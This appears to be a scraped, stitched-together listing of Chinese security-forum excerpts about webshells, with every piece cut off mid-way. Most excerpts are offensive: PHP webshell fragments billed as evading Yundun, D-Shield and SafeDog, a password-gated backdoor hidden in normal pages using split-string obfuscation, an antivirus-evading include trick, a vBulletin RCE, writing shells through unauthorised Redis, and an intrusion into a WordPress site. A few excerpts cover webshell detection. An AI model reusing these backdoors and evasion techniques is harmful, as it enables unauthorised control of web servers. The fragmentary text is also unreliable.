过云盾、D盾各种盾php shell

<?php
 
//过云盾、D盾各种盾shell
$id = $_GET['id'];
//debug
echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
$s = '';

webshell检测-日志分析

一直认为日志分析的最终奥义是取证与预测——讲述完整的已发生、正在发生的、将来会发生的攻击故事(何时.何地.何人.何事.何故)。
而本文之所以讲如何识别webshell,就是想从确定的攻击事件来回溯已发生的攻击事件,被植入的webshell毫无疑问就属于确定的攻击事件,只要曾经被传入过,就有很高的概率一直被黑
webshell检测不是新鲜事,主流有杀毒软件与入侵检测系统两种做法,而这两种方法除了技术上的缺陷外(后文会讲),更多时候,由于无法拿到完整的文件样本(webshell查杀工具部署成本比较高,有系统兼容问题,有性能问题),或无法拿到完整的流量信息(流量镜像的部署成本也非常高),而采用成本较低的日志分析方法。

此时此刻怎能不打狗?

双十一不单单是程序猿的节日且更是安全狗的节日,三个月以前就说过挖到各种各样安全狗绕过方法了,一直没找到好的时间来发出来。那何不乘这个时候发出来让大家开心的过一个节日

极其隐蔽的pHp小马穿插在正常页面中

<?php
$pssddd="2b";//密码
if($_GET["hks"]==$pssddd){@set_time_limit(100);$slstss="fi"."le_"."ge"."t_c"."onten"."ts";$raworistr='

vBulletin 5 远程命令执行(无需登录)

官方公告:http://www.vbulletin.org/forum/showthread.php?p=2558144

POC 原文地址:http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq

有个叫 Coldzer0 的家伙在 http://0day.today 上卖 vBulletin 的 RCE exp,vBulletin 的主论坛已经被攻破,据称该漏洞已经存在3年以上。下面是漏洞分析:


2015免杀一句话、免杀大马收集

测试过两个完美过安全狗,被狗咬的话就试试文件包含的方法

文件包含方法:

asp代码
<!--#include file="hack1996.txt"-->
php代码
<?php include 'hack1996.txt';  ?>
aspx代码
<code><!--#include file="hack1996.txt"--> </code >

"一句话"的艺术——简单的编码和变形绕过检测

2013122817573781043.jpg

redis写shell的小技巧

最近碰到一个redis未授权访问,想近各种办法最后终于成功了写了webshell,这里写下一点点小经验。

首先,写shell的基本方式,还是按照phithon发的文章,安全脉搏的《利用redis写webshell》

这种方法对于没有存多少数据的redis数据库来说还是很适用的,但是当数据库比较大时,就会遇到一些问题(比如本例中数据库下载下来大小约为200M,还算比较大的)。

首先就是这么大的数据量,里面不可避免会出现这样的字符串“<?”,php遇到这个字符串时就把后面的内容当php脚本解析了,自然会报错,不能运行,对于这个问题,没别的办法,只能找到出错的地方的键值,删掉,然后再写shell。


推荐个扫 webshell后门 webshell木马 一句话的asp程序

功能说明:
1.能查找后缀名为asp,asa,cdx,cer,aspx等木马
  如果目录下文件过多,容易脚本超时。

2.能查找IIS解析漏洞的文件,这些文件不一定是木马,需要手动查看
  比如"D:\WEBROOT\website\hack.asp\a.gif"或
  "D:\WEBROOT\website\hack.asp;.gif"一类的文件能查到

权5站点全站不可写拿webshell方法

看到一个站点,(此处忽略一万字)先爬虫一下。

使用这个工具

发现一个info目录很可疑,打开以后凭借我多年的日站经验、敏锐的观察力、超强的分析力; 断定这是WordPress
此博客程序没有什么好的漏洞,好用的XSS又需要管理员交互
于是使用以下脚本: